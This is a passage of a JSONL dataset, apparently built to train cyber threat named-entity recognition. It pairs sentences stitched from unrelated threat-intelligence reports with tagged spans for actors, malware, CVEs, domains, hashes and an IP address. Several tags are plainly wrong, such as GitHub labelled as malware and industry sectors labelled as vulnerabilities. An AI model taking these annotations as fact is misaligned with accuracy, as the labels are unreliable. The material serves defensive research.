efficiencies through the use of scripts , or as some members of the group call them , formats.” These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . 
Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today’s most pernicious email scams , this report demonstrates that a much more holistic approach—one based on threat actor identity rather than type of fraudulent activity—is required to detect email fraud and protect organizations . This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations . Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia . In the past , Sednit used a similar technique for credential phishing . At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . It used GitHub and Slack as tools for communication between the malware and its controller . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . 
This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative ( ZDI ) that was just patched this April .", "spans": {"ORGANIZATION: QiAnXin": [[0, 7]], "THREAT_ACTOR: ‘APT-C-35’": [[43, 53]], "THREAT_ACTOR: Pakistan": [[88, 96]], "THREAT_ACTOR: Scattered Canary": [[162, 178], [570, 586], [761, 777], [942, 958], [1320, 1336], [1697, 1713]], "THREAT_ACTOR: Scattered Canary’s": [[329, 347], [1076, 1094]], "TOOL: email": [[735, 740], [1982, 1987], [2430, 2435]], "ORGANIZATION: state government agencies": [[1009, 1034]], "THREAT_ACTOR: actors": [[1169, 1175]], "MALWARE: scripts": [[1188, 1195]], "MALWARE: templates": [[1200, 1209]], "MALWARE: LoJax": [[1645, 1650]], "THREAT_ACTOR: Sednit": [[1679, 1685], [2067, 2073], [2173, 2179], [2302, 2308]], "MALWARE: sophisticated tools": [[2093, 2112]], "THREAT_ACTOR: Zebrocy": [[2586, 2593]], "MALWARE: backdoor": [[2621, 2629]], "THREAT_ACTOR: SLUB": [[2754, 2758], [2999, 3003]], "VULNERABILITY: CVE-2018-8174": [[2813, 2826]], "THREAT_ACTOR: It": [[2863, 2865]], "MALWARE: GitHub": [[2871, 2877]], "MALWARE: Slack": [[2882, 2887]], "VULNERABILITY: CVE-2019-0752": [[3082, 3095]], "ORGANIZATION: Trend Micro’s Zero Day Initiative": [[3147, 3180]], "ORGANIZATION: ZDI": [[3183, 3186]]}, "info": {"id": "cyberner_stix_train_000031", "source": "cyberner_stix_train"}} {"text": "At the time of writing , to our knowledge no other third-party app stores , nor the official Google Play store , were or are hosting this malicious HenBox variant masquerading as DroidVPN . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . 
APT16 actors sent spear phishing emails to two Taiwanese media organizations .", "spans": {"SYSTEM: Google Play": [[93, 104]], "MALWARE: HenBox": [[148, 154]], "ORGANIZATION: Henkel": [[209, 215]], "THREAT_ACTOR: Winnti": [[254, 260]], "THREAT_ACTOR: APT16 actors": [[297, 309]], "TOOL: emails": [[330, 336]], "ORGANIZATION: media organizations": [[354, 373]]}, "info": {"id": "cyberner_stix_train_000032", "source": "cyberner_stix_train"}} {"text": "The oldest app of the second campaign was last updated in April 2016 , meaning that the malicious code hid for a long time on the Play store undetected . Their operations against gaming and technology organizations are believed to be economically motivated in nature . It starts by initializing a random number generator and reading 100 bytes inside the ZxShell Dll at a hardcoded location . Using tools that are more lightweight and generic than those observed in prior OT incidents , the actor likely decreased the time and resources required to conduct a cyber physical attack .", "spans": {"SYSTEM: Play store": [[130, 140]], "ORGANIZATION: gaming": [[179, 185]], "ORGANIZATION: technology organizations": [[190, 214]], "MALWARE: ZxShell": [[354, 361]], "TOOL: Dll": [[362, 365]]}, "info": {"id": "cyberner_stix_train_000033", "source": "cyberner_stix_train"}} {"text": "Mobile devices are at the frontier of cyber espionage , and other criminal motives . Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies . The plugin registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\zxplug is opened and each value is queried . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. 
and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[191, 217]], "ORGANIZATION: KSN": [[220, 223]], "ORGANIZATION: gaming companies": [[276, 292]], "THREAT_ACTOR: RA Group": [[402, 410]], "ORGANIZATION: the U.S.": [[453, 461]], "ORGANIZATION: South Korea": [[464, 475]], "ORGANIZATION: Taiwan": [[478, 484]], "ORGANIZATION: U.K.": [[491, 495]], "ORGANIZATION: India": [[500, 505]], "VULNERABILITY: business verticals": [[521, 539]], "VULNERABILITY: manufacturing": [[552, 565]], "VULNERABILITY: wealth management": [[568, 585]], "VULNERABILITY: insurance providers": [[588, 607]], "VULNERABILITY: pharmaceuticals and financial management consulting companies": [[610, 671]]}, "info": {"id": "cyberner_stix_train_000034", "source": "cyberner_stix_train"}} {"text": "further straining the relationship between Hamas and the Palestinian Authority who governs the West Bank .", "spans": {"ORGANIZATION: Hamas": [[43, 48]], "ORGANIZATION: Palestinian Authority": [[57, 78]]}, "info": {"id": "cyberner_stix_train_000035", "source": "cyberner_stix_train"}} {"text": "The result of the password validation will always be wrong , but after the apparent validation attempt , the decoy PDF document is opened .", "spans": {"TOOL: PDF": [[115, 118]]}, "info": {"id": "cyberner_stix_train_000036", "source": "cyberner_stix_train"}} {"text": "In the examined version , it was downloaded from : hxxp : //url [ . The malware starts communicating with the C&C server by sending basic information about the infected machine . 
Circumstantial evidence suggests there could be a link between this group and the United Arab Emirates ( UAE ) government , but that has not been confirmed .", "spans": {"MALWARE: malware": [[72, 79]], "ORGANIZATION: United Arab Emirates ( UAE ) government": [[261, 300]]}, "info": {"id": "cyberner_stix_train_000037", "source": "cyberner_stix_train"}} {"text": "+86.01078456689 The command-and-control server is hosting an index page which also serves an APK file : The referenced “ Document.apk ” is 333583 bytes in size , MD5 : c4c4077e9449147d754afd972e247efc . PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server . A cursory review of BlackOasis ' espionage campaign suggests there is some overlap between the group 's actions and Saudi Arabia 's geopolitical interests .", "spans": {"VULNERABILITY: CVE-2017-7269": [[219, 232]], "THREAT_ACTOR: BlackOasis": [[376, 386]], "ORGANIZATION: geopolitical": [[488, 500]]}, "info": {"id": "cyberner_stix_train_000038", "source": "cyberner_stix_train"}} {"text": "The group has focused mainly on governmental targets in Iraq and Saudi Arabia , according to past telemetry . This time the document purported to be about the involvement of the Emir of Qatar in funding ISIS , which was seemingly copied from a website critical of Qatar .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: governmental": [[32, 44]]}, "info": {"id": "cyberner_stix_train_000039", "source": "cyberner_stix_train"}} {"text": "intelnetservice.com intelsupport.net The export called “ Applicate ” runs a standard Windows application message loop until a “ WM_ENDSESSION ” message is received .", "spans": {"DOMAIN: intelnetservice.com": [[0, 19]], "DOMAIN: intelsupport.net": [[20, 36]], "SYSTEM: Windows": [[85, 92]]}, "info": {"id": "cyberner_stix_train_000040", "source": "cyberner_stix_train"}} {"text": "File Server ( http : //www.psservicedl [ . 
The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The Seedworm group controls its Powermud backdoor from behind a proxy network to hide the ultimate command-and-control ( C&C ) location .", "spans": {"THREAT_ACTOR: group": [[47, 52]], "TOOL: Daserf malware": [[135, 149]], "VULNERABILITY: Flash exploits": [[175, 189]], "THREAT_ACTOR: Seedworm group": [[212, 226]], "MALWARE: Powermud backdoor": [[240, 257]], "TOOL: command-and-control": [[307, 326]], "TOOL: C&C": [[329, 332]]}, "info": {"id": "cyberner_stix_train_000042", "source": "cyberner_stix_train"}} {"text": "The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor .", "spans": {"VULNERABILITY: exploit": [[4, 11]], "THREAT_ACTOR: Silence’s": [[21, 30]], "ORGANIZATION: server management software provider": [[165, 200]]}, "info": {"id": "cyberner_stix_train_000043", "source": "cyberner_stix_train"}} {"text": "Of these , CosmicDuke and MiniDuke appear to have been in more active use , while receiving only minor updates .", "spans": {"MALWARE: CosmicDuke": [[11, 21]], "MALWARE: MiniDuke": [[26, 34]]}, "info": {"id": "cyberner_stix_train_000045", "source": "cyberner_stix_train"}} {"text": "It ’s worth mentioning that , according to X-Force IRIS , the initial compromise took place weeks before the actual Shamoon deployment and activation were launched .", "spans": {"ORGANIZATION: X-Force IRIS": [[43, 55]], "MALWARE: Shamoon": [[116, 123]]}, "info": {"id": "cyberner_stix_train_000046", "source": "cyberner_stix_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . 
Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "ORGANIZATION: WildFire": [[94, 102]], "TOOL: e-mail": [[120, 126]], "TOOL: Word": [[140, 144], [211, 215]], "FILEPATH: hello.docx": [[158, 168]], "ORGANIZATION: Government": [[252, 262]]}, "info": {"id": "cyberner_stix_train_000047", "source": "cyberner_stix_train"}} {"text": "First , the app has to turn off SELinux protection . This attack campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes . In the past , threat actors would modify easily compromised websites to host C2 commands and configuration , as observed in the China based APT1 ’s WEBC2 suite of backdoors . This downloader is unique per system and contains a customized backdoor written in Assembler .", "spans": {"SYSTEM: SELinux": [[32, 39]], "ORGANIZATION: chemical sector": [[89, 104]], "TOOL: C2": [[300, 302]], "THREAT_ACTOR: APT1": [[363, 367]], "MALWARE: WEBC2": [[371, 376]]}, "info": {"id": "cyberner_stix_train_000048", "source": "cyberner_stix_train"}} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . 
The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"MALWARE: malicious documents": [[4, 23]], "ORGANIZATION: Pakistan Army": [[126, 139]], "VULNERABILITY: EternalBlue": [[259, 270]], "VULNERABILITY: exploits": [[271, 279]], "MALWARE: Petya": [[393, 398]], "MALWARE: NotPetya": [[401, 409]]}, "info": {"id": "cyberner_stix_train_000049", "source": "cyberner_stix_train"}} {"text": "This malware also contains a screen recorder . The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 . APT12 is believed to be a cyber espionage group thought to have links to the Chinese People's Liberation Army . For example , HTTPS over port 8088[1 ] or port 587[2 ] as opposed to the traditional port 443 .", "spans": {"TOOL: Lamberts toolkit": [[51, 67]], "THREAT_ACTOR: APT12": [[145, 150]], "ORGANIZATION: Chinese People's Liberation Army": [[222, 254]]}, "info": {"id": "cyberner_stix_train_000050", "source": "cyberner_stix_train"}} {"text": "After infestation , Weeping Angel places the target TV in a 'Fake-Off' mode , so that the owner falsely believes the TV is off when it is on . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": {"THREAT_ACTOR: Weeping Angel": [[20, 33]], "VULNERABILITY: exploit": [[177, 184]], "FILEPATH: THAM luan - GD -": [[194, 210]], "FILEPATH: NCKH2.doc": [[211, 220]], "MALWARE: MS12-060": [[305, 313]]}, "info": {"id": "cyberner_stix_train_000051", "source": "cyberner_stix_train"}} {"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . 
Carbanak is a backdoor used by the attackers to compromise the victim .", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "ORGANIZATION: FireEye": [[37, 44]], "FILEPATH: Carbanak": [[138, 146]], "MALWARE: backdoor": [[152, 160]], "THREAT_ACTOR: attackers": [[173, 182]]}, "info": {"id": "cyberner_stix_train_000052", "source": "cyberner_stix_train"}} {"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" Flash text \" . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address .", "spans": {"VULNERABILITY: CVE-2017-1182": [[87, 100]], "MALWARE: Microsoft Equation Editor": [[118, 143]], "MALWARE: EQNEDT32.exe": [[146, 158]], "ORGANIZATION: Google": [[308, 314]], "TOOL: Flash": [[389, 394]], "TOOL: email": [[550, 555]]}, "info": {"id": "cyberner_stix_train_000053", "source": "cyberner_stix_train"}} {"text": "Once we looked into the file , we quickly found out that the inner-workings of the APK included a malicious payload , embedded in the original code of the application . PyLocky was found to be targeting entities in France and Germany . We witnessed this actor extensively testing a known public exploit during its preparation for the next campaign . Fake browser updates are a very common decoy used by malware authors .", "spans": {"TOOL: PyLocky": [[169, 176]]}, "info": {"id": "cyberner_stix_train_000054", "source": "cyberner_stix_train"}} {"text": "Conclusion This trojan shows a new path for threats to evolve . 
Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls . TEMP.Hermit is generally linked to operations focused on South Korea and the United States .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[101, 109]], "ORGANIZATION: CTU": [[145, 148]], "THREAT_ACTOR: TEMP.Hermit": [[249, 260]]}, "info": {"id": "cyberner_stix_train_000055", "source": "cyberner_stix_train"}} {"text": "Both versions are designed to collect system information and running processes and send them to the designated C2 server using http POST to the URI used in both cases is /agr-enum/progress-inform/cube.php?res= .", "spans": {"TOOL: C2": [[111, 113]]}, "info": {"id": "cyberner_stix_train_000056", "source": "cyberner_stix_train"}} {"text": "We believe Sofacy used this tool , as the macro within their delivery document closely resembles the macros found within Luckystrike .", "spans": {"THREAT_ACTOR: Sofacy": [[11, 17]], "TOOL: macro": [[42, 47]], "TOOL: Luckystrike": [[121, 132]]}, "info": {"id": "cyberner_stix_train_000057", "source": "cyberner_stix_train"}} {"text": "Both INDRIK SPIDER ( with BitPaymer ransomware ) and GRIM SPIDER ( with Ryuk ransomware ) have made headlines with their high profile victims and ransom profits , demonstrating that big game hunting is a lucrative enterprise . 
A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[5, 18]], "TOOL: BitPaymer": [[26, 35]], "TOOL: ransomware": [[36, 46]], "THREAT_ACTOR: GRIM SPIDER": [[53, 64]], "TOOL: Ryuk ransomware": [[72, 87]], "THREAT_ACTOR: Jripbot": [[295, 302]], "THREAT_ACTOR: Morpho": [[311, 317]], "ORGANIZATION: high profile companies": [[370, 392]]}, "info": {"id": "cyberner_stix_train_000058", "source": "cyberner_stix_train"}} {"text": "In this campaign , adversaries did not use any exploit .", "spans": {}, "info": {"id": "cyberner_stix_train_000059", "source": "cyberner_stix_train"}} {"text": "The stream of bytes is sent over TCP to the client .", "spans": {}, "info": {"id": "cyberner_stix_train_000060", "source": "cyberner_stix_train"}} {"text": "Figure 8 . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . The malicious DLL exports the same function names as the original mcvsocfg.dll library . 
HHS HC3 warned that the stolen credentials may have been used to compromise a number of healthcare organizations and enterprises in other industries .", "spans": {"THREAT_ACTOR: APT33": [[55, 60]], "ORGANIZATION: military": [[178, 186]], "ORGANIZATION: commercial": [[191, 201]], "TOOL: DLL": [[225, 228]], "FILEPATH: mcvsocfg.dll": [[277, 289]], "ORGANIZATION: HHS HC3": [[300, 307]], "ORGANIZATION: healthcare organizations": [[388, 412]], "ORGANIZATION: enterprises in other industries": [[417, 448]]}, "info": {"id": "cyberner_stix_train_000061", "source": "cyberner_stix_train"}} {"text": "7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128 .", "spans": {"FILEPATH: 7bb719f1c64d627ecb1f13c97dc050a7bb1441497f26578f7b2a9302adbbb128": [[0, 64]]}, "info": {"id": "cyberner_stix_train_000062", "source": "cyberner_stix_train"}} {"text": "Do not download mobile apps from unofficial or unauthorized sources . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . Spring Dragon 's infiltration techniques there were not simply spearphish .", "spans": {"MALWARE: KBDLV2.DLL": [[197, 207]], "MALWARE: AUTO.DLL": [[211, 219]], "THREAT_ACTOR: Spring Dragon": [[256, 269]]}, "info": {"id": "cyberner_stix_train_000063", "source": "cyberner_stix_train"}} {"text": "The implants are highly configurable via encrypted configuration files , which allow the adversary to customize various components , including C2 servers , the list of initial tasks to carry out , persistence mechanisms , encryption keys and others .", "spans": {"TOOL: C2": [[143, 145]]}, "info": {"id": "cyberner_stix_train_000064", "source": "cyberner_stix_train"}} {"text": "] com/ ) : This server provides APK files with advertising network . 
A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . There was a mistake in the original Morphisec analysis which linked these attacks to FIN7 .", "spans": {"THREAT_ACTOR: BlackOasis group": [[99, 115]], "THREAT_ACTOR: hackers": [[134, 141]], "VULNERABILITY: zero-day exploit": [[185, 201]], "THREAT_ACTOR: Gamma Group": [[327, 338]], "ORGANIZATION: Morphisec": [[377, 386]], "THREAT_ACTOR: FIN7": [[426, 430]]}, "info": {"id": "cyberner_stix_train_000065", "source": "cyberner_stix_train"}} {"text": "Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian state-sponsored origin which they ’ve named Magic Hound .", "spans": {"FILEPATH: sloo.exe": [[41, 49]], "THREAT_ACTOR: Magic Hound": [[154, 165]]}, "info": {"id": "cyberner_stix_train_000066", "source": "cyberner_stix_train"}} {"text": "In the most recent variant , Sofacy modified the internals of the malicious scripts , but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server .", "spans": {"THREAT_ACTOR: Sofacy": [[29, 35]], "TOOL: Flash": [[178, 183]], "TOOL: C2": [[221, 223]]}, "info": {"id": "cyberner_stix_train_000067", "source": "cyberner_stix_train"}} {"text": "A lockdown activity , which is a transparent window shown at the top of the screen that contains a “ loading ” cursor . Alternatively , the attackers might have used social engineering to trick WikiLeaks 's DNS provider into handing over the credentials , or simple requested that a password reset link be sent to a compromised email address . 
The group 's targets include a number of organizations and individuals located in Russia .", "spans": {"ORGANIZATION: WikiLeaks": [[194, 203]], "ORGANIZATION: DNS provider": [[207, 219]]}, "info": {"id": "cyberner_stix_train_000068", "source": "cyberner_stix_train"}} {"text": "In more up-to-date versions of Android , EventBot will ask for permissions to run in the background before deleting itself from the launcher . DoublePulsar is then used to inject a secondary payload , which runs in memory only . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism .", "spans": {"SYSTEM: Android": [[31, 38]], "MALWARE: EventBot": [[41, 49]], "MALWARE: DoublePulsar": [[143, 155]], "THREAT_ACTOR: Lotus Blossom": [[253, 266]]}, "info": {"id": "cyberner_stix_train_000069", "source": "cyberner_stix_train"}} {"text": "This is a good example where two-factor authentication based on SMS would fail since the attacker can read the SMS . APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function . OceanLotus : cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d Loader #2 . 
Additionally , by using leaked source code , threat actors can confuse or mislead investigators , as security professionals may be more likely to misattribute the activity to the wrong actor .", "spans": {"THREAT_ACTOR: APT10": [[117, 122]], "TOOL: PlugX malware": [[138, 151]], "THREAT_ACTOR: OceanLotus": [[299, 309]], "FILEPATH: cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d": [[312, 376]], "ORGANIZATION: security professionals": [[490, 512]], "VULNERABILITY: misattribute the activity to the wrong actor": [[535, 579]]}, "info": {"id": "cyberner_stix_train_000070", "source": "cyberner_stix_train"}} {"text": "The system verifies the signature of the legitimate file while installing the malicious file . There has also been at least one victim targeted by a spear-phishing attack . In the case we examined , the path was C:\\ProgramData\\DRM\\CLR\\CLR.exe . The campaign started in at least June 2023 , and the ransom note appears to mimic certain aspects of the ransom note used in the global WannaCry attacks from 2017 .", "spans": {"FILEPATH: C:\\ProgramData\\DRM\\CLR\\CLR.exe": [[212, 242]]}, "info": {"id": "cyberner_stix_train_000071", "source": "cyberner_stix_train"}} {"text": "For the Delphi version , the following registry key and value are used for persistence :", "spans": {"TOOL: Delphi": [[8, 14]]}, "info": {"id": "cyberner_stix_train_000072", "source": "cyberner_stix_train"}} {"text": "Both CloudDuke backdoor variants support simple backdoor functionality , similar to SeaDuke .", "spans": {"MALWARE: CloudDuke backdoor": [[5, 23]], "MALWARE: SeaDuke": [[84, 91]]}, "info": {"id": "cyberner_stix_train_000073", "source": "cyberner_stix_train"}} {"text": "LINKS TO WOLF INTELLIGENCE During the Virus Bulletin conference in 2018 , CSIS researchers Benoît Ancel and Aleksejs Kuprins did a presentation on Wolf Research and the offensive arsenal developed by the organization . 
The police suspected Lurk of stealing nearly three billion rubles , using malicious software to systematically withdraw large sums of money from the accounts of commercial organizations , including banks . Older versions also used an XLS exploit . The source code is loaded from one of several domains impersonating Google ( google - analytiks[.]com ) or Adobe ( updateadobeflash[.]website ): That code contains all the web elements ( images , fonts , text ) needed to render the fake browser update page .", "spans": {"ORGANIZATION: CSIS": [[74, 78]], "ORGANIZATION: Wolf Research": [[147, 160]], "TOOL: Lurk": [[240, 244]], "ORGANIZATION: commercial organizations": [[380, 404]], "ORGANIZATION: banks": [[417, 422]], "TOOL: XLS": [[453, 456]], "TOOL: Google": [[535, 541]], "TOOL: Adobe": [[574, 579]]}, "info": {"id": "cyberner_stix_train_000074", "source": "cyberner_stix_train"}} {"text": "As has been previously reported , some versions of the Android malware were present in the Google Play Store . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . 
Little detail is given on the nature of how the connection between DNSMessenger and MuddyWater was discovered it isn't possible for us to verify this link .", "spans": {"SYSTEM: Android": [[55, 62]], "SYSTEM: Google Play Store": [[91, 108]], "VULNERABILITY: Carbanak": [[131, 139]], "THREAT_ACTOR: criminals": [[206, 215]], "ORGANIZATION: financial industry": [[256, 274]], "ORGANIZATION: customers": [[298, 307]], "MALWARE: DNSMessenger": [[377, 389]], "MALWARE: MuddyWater": [[394, 404]]}, "info": {"id": "cyberner_stix_train_000075", "source": "cyberner_stix_train"}} {"text": "] com Malicious Twitter accounts : https : //twitter.com/lucky88755 https : //twitter.com/lucky98745 https : //twitter.com/lucky876543 https : //twitter.com/luckyone1232 https : //twitter.com/sadwqewqeqw https : //twitter.com/gyugyu87418490 https : //twitter.com/fdgoer343 https : //twitter.com/sdfghuio342 https : //twitter.com/asdqweqweqeqw https : //twitter.com/ukenivor3 The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . The document contained a VBS macro that once decompressed was approximately 650 lines of code . 
Bullock had spent many hours poring over the hundreds of thousands of emails that the Ashley Madison hackers stole from Biderman and published online in 2015 .", "spans": {"ORGANIZATION: Twitter": [[16, 23]], "TOOL: JHUHUGIT": [[379, 387]], "VULNERABILITY: Java zero-day": [[485, 498]], "VULNERABILITY: CVE-2015-2590": [[501, 514]], "TOOL: VBS macro": [[557, 566]], "ORGANIZATION: Bullock": [[628, 635]], "THREAT_ACTOR: Ashley Madison hackers": [[714, 736]], "ORGANIZATION: Biderman": [[748, 756]]}, "info": {"id": "cyberner_stix_train_000076", "source": "cyberner_stix_train"}} {"text": "The file is a 64bit-compatible compiled binary of the open source utility Winexe .", "spans": {"TOOL: Winexe": [[74, 80]]}, "info": {"id": "cyberner_stix_train_000077", "source": "cyberner_stix_train"}} {"text": "We ’ll cover more recent 2018 change in their targeting and the malware itself at SAS 2018 .", "spans": {"ORGANIZATION: SAS": [[82, 85]]}, "info": {"id": "cyberner_stix_train_000078", "source": "cyberner_stix_train"}} {"text": "In addition , by using VBA2Graph , we were able to visualize the VBA call graph in the macros of each document . Compared to Patchwork , whose Trojanized documents exploit at least five security flaws , Confucius' backdoors are delivered through Office files exploiting memory corruption vulnerabilities CVE-2015-1641 and CVE-2017-11882 .", "spans": {"MALWARE: VBA2Graph": [[23, 32]], "THREAT_ACTOR: Patchwork": [[125, 134]], "VULNERABILITY: exploit": [[164, 171]], "VULNERABILITY: CVE-2015-1641": [[304, 317]], "VULNERABILITY: CVE-2017-11882": [[322, 336]]}, "info": {"id": "cyberner_stix_train_000079", "source": "cyberner_stix_train"}} {"text": "Its main task is to bypass the two-factor authentication of the client in the online banking system . Thus , it is clear they are trying to be as stealthy as possible by hiding in the network traffic of the targeted organizations . There are newer versions , up to version 3.39 as of October 2014 . 
An exhaustive analysis of domains registered to the various Vistomail pseudonyms used by Harrison shows he also ran Bash - a - Business[.]com , which Harrison dedicated to “ all those sorry ass corporate executives out there profiting from your hard work , organs , lives , ideas , intelligence , and wallets . ”", "spans": {}, "info": {"id": "cyberner_stix_train_000080", "source": "cyberner_stix_train"}} {"text": "Static analysis tools like IDA may not be useful in analyzing custom code that is interpreted and executed through a VM and a new set of instructions . In addition , we observed a TTP shift post publication with regards to their malware delivery ; they started using compromised but legitimate domains to serve their malware . Supply-chain attacks are hard to detect from the consumer perspective . Several issues in Foxit PDF reader could lead to arbitrary code execution Foxit PDF Reader is one of the most popular PDF readers on the market , offering many similar features to Adobe Acrobat .", "spans": {"TOOL: legitimate domains": [[283, 301]], "TOOL: Foxit PDF reader": [[417, 433]], "TOOL: Foxit PDF Reader": [[473, 489]], "TOOL: Adobe Acrobat": [[579, 592]]}, "info": {"id": "cyberner_stix_train_000081", "source": "cyberner_stix_train"}} {"text": "Their evolving and modified SPLM / CHOPSTICK / XAgent code is a long-standing part of Sofacy activity , however much of it is changing .", "spans": {"MALWARE: SPLM": [[28, 32]], "MALWARE: CHOPSTICK": [[35, 44]], "MALWARE: XAgent": [[47, 53]], "THREAT_ACTOR: Sofacy": [[86, 92]]}, "info": {"id": "cyberner_stix_train_000082", "source": "cyberner_stix_train"}} {"text": "we assess with high confidence that these incidents were conducted by APT10 also known as Stone Panda , menuPass , CVNX in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage . 
The first attack started in early July with a ShimRatReporter payload .", "spans": {"THREAT_ACTOR: APT10": [[70, 75]], "THREAT_ACTOR: Stone Panda": [[90, 101]], "THREAT_ACTOR: menuPass": [[104, 112]], "THREAT_ACTOR: CVNX": [[115, 119]], "FILEPATH: ShimRatReporter": [[278, 293]]}, "info": {"id": "cyberner_stix_train_000083", "source": "cyberner_stix_train"}} {"text": "This alone would attract a whole new audience–and a new stream of revenue–for Yingmob . Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . APT33 : 64.251.19.214 [REDACTED].sytes.net . The Stuxnet Virus identified in 2010 that was used to destroy the Iranian centrifuges is but one relevant example of such a motivation .", "spans": {"ORGANIZATION: Yingmob": [[78, 85]], "TOOL: WannaCry": [[130, 138]], "TOOL: WCry": [[145, 149]], "TOOL: WanaCrypt0r": [[157, 168]], "ORGANIZATION: telecommunications": [[346, 364]], "ORGANIZATION: shipping": [[367, 375]], "ORGANIZATION: car manufacturers": [[378, 395]], "ORGANIZATION: universities": [[398, 410]], "ORGANIZATION: health care industries": [[415, 437]], "THREAT_ACTOR: APT33": [[455, 460]], "IP_ADDRESS: 64.251.19.214": [[463, 476]], "DOMAIN: [REDACTED].sytes.net": [[477, 497]], "MALWARE: The Stuxnet Virus": [[500, 517]], "ORGANIZATION: Iranian centrifuges": [[566, 585]]}, "info": {"id": "cyberner_stix_train_000084", "source": "cyberner_stix_train"}} {"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . 
